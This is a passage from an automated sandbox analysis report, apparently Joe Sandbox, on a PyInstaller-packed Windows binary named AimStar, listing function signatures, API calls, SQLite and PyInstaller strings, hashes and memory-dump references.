                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                          • API String ID: 2830847230-2063813899
                                                                                                                                                                                                                                          • Opcode ID: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
                                                                                                                                                                                                                                          • Instruction ID: a493c4fbd6e85cb4b05d8dd92b03d414209075cf8db0efbeb2a189b61c36a04a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7912162A0AB8596EB60CF12D4502BAB7A1FB88BC0F459235DF9D07785EF3CE451C324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                          • API String ID: 2830847230-3727861699
                                                                                                                                                                                                                                          • Opcode ID: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
                                                                                                                                                                                                                                          • Instruction ID: 5e703b82a80ca4699ee9137612b6b7f8685b8a819cb366dc691ef35ea03b8eb2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA81CF32B0A682ABE7618F25E4447AE77A1FB847C4F448036EB8D47795DF38E485C714
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                          • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                          • Instruction ID: af6b0c84cf4678254ca775d5ed28f62648ecb21beb9ffa9c9ff33da36e3e42b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31B736B1CA8552E710B761A8426E6B298BF887E4F800131EE4D83755DF3CE54AC610
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                          • Instruction ID: 3f0175d0238b3dbc5c8a090f14237fe98c94a6ffbeae6feca79db69f4f1761d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F731733661DE8189EB60EF21E8562F9A3A4FF89794F840135EA4D47B55DF3CE148C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF710F4918F,?,00007FF710F43C55), ref: 00007FF710F42BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF710F42C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction ID: 172aa94df94bc69ce49b602b5742859e44903b844107bdb4e256ec977cf9f4b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3219F7270CF4182E650EB14B8467AAB3A8FB88794F804136EE8D97755DE3CE249C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF710F41B99), ref: 00007FF710F42760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                          • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction ID: 3c69edb76c156c611ccee13237ee720f5e956f80c0562d24120d1e99a6fb098e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89217172A1CB8552E650AB50B8427E6A398BB88794F800131EE8C83759DF7CE289C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction ID: 72619413d11f2a896fe30922e25daf4f238b0360d91c34131b1b7604a7e68c2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF04425B0DE0691FA14AB14E4567759328EF85771F940235D56D463E4DF2CF28CC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: f4721a673b98db7797d5913a70fc1859a576ca3f134d3f79da407c4c856ce546
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511917AE5CE1301FA54B124E4573F5A04CEF99374F848634EA7E063DACE2CB94AD224
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B41F
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B43E
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B466
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B477
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                          • Instruction ID: cb56a1f8abd9fb011eb0640d0143788b324f4ab81b2fa80e5d6d664f2249befb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72116A20A0CE0641FA68FB215653179E16A5F847B0FD88334E93E467D7DE2CB649C721
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                          • Instruction ID: a465283edfeb73a356b6bfc112ddec59a253b4987a0840e85d6d0cb3dee9598d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85110620A0CA0A41F959B721441717991694F49370FC84774E93E5A3C3DD2CB60DC732
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00000000,?,00000003,00000000,00007FF8A87DA007,?,00000007,?), ref: 00007FF8A87D9997
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                                                                                          • API String ID: 2830847230-2903559916
                                                                                                                                                                                                                                          • Opcode ID: a21a639f670ee7c7088fbac57dc44845181275f4fd98a2d4173d5ea1f5654c93
                                                                                                                                                                                                                                          • Instruction ID: 5d8dafd230e42de67bb7b00e03920f381faf1765ef949c5cff2b1517626c6433
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a21a639f670ee7c7088fbac57dc44845181275f4fd98a2d4173d5ea1f5654c93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43B1EF22A4B682A5FA659B1594403BA6BE0EF91FD4F499135CE4D073C5EF3CE401CF28
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                          • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction ID: cf552a08f4a76e8837201d6e5e0f8f94e690cbd1a24550d90857e6695f15bee9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8391CF32A0CE4641FB60AE25E45237DB2B9AB49BA4FC44136DA69433D5DF3CF649C321
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FF8A87E8AEF), ref: 00007FF8A87E87B9
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FF8A87E8AEF), ref: 00007FF8A87E883B
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FF8A87E8AEF), ref: 00007FF8A87E892D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                          • API String ID: 2830847230-2313493979
                                                                                                                                                                                                                                          • Opcode ID: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
                                                                                                                                                                                                                                          • Instruction ID: 165122c6c9b52428059f62afd3c75660ae77a15ddb0eaa4e9251d4c01e944f09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37B1D222A4AB8196E720CF25D4802B977A1FB55BE4F098335DEAD077D5EF38E4A1C314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF8A87978D7), ref: 00007FF8A879D5BA
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF8A87978D7), ref: 00007FF8A879D5E4
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF8A87978D7), ref: 00007FF8A879D637
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                          • API String ID: 2830847230-2852464175
                                                                                                                                                                                                                                          • Opcode ID: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
                                                                                                                                                                                                                                          • Instruction ID: cf2e8f07e34652d680e59f9f0dfd5f21ec6b05b51277f5f110c5f9882ad74cb3
